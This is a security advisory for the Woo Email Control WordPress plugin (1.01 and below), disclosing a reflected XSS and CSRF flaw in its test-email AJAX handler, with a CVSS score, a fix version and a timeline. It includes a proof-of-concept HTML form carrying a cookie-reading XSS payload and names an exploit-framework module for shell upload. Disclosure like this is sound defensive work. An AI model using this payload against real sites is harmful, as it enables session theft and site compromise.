Woo Email Control <= 1.01 Reflected XSS Disclosure

Homepage

https://wordpress.org/plugins/woo-email-control/

Overview

Due to a lack of encoding and CSRF mitigation in the test_email function found on line 106 of classes/class-wooctrl.php , it is possible to automate a request to the AJAX handler for the wooctrl_send_test_email action which will reflect the specified script back to the end user.

CVSS Score

4.8

CVSS Vector

(AV:N/AC:M/Au:N/C:P/I:P/A:N/E:F/RL:OF/RC:C)

Versions Affected

1.01 and below

Solution

Upgrade to version 1.02

Proof of Concept <form method="post" action="http://<target>/wp-admin/admin-ajax.php?action=wooctrl_send_test_email"> <input type="text" name="email_class" value="WC_Email_Customer_New_Account"> <input type="text" name="recipient" value="user@user.com<img src=x onerror=alert(document.cookie)>"> <input type="submit" value="Test"> </form> WordPress Exploit Framework Module

exploits/woo_email_control_reflected_xss_shell_upload

WPVDB-ID

Pending

Disclosure Timeline 2016-07-18 : Identified vulnerability, contacted vendor with POC and a patch. 2016-07-18 : Vendor released patch.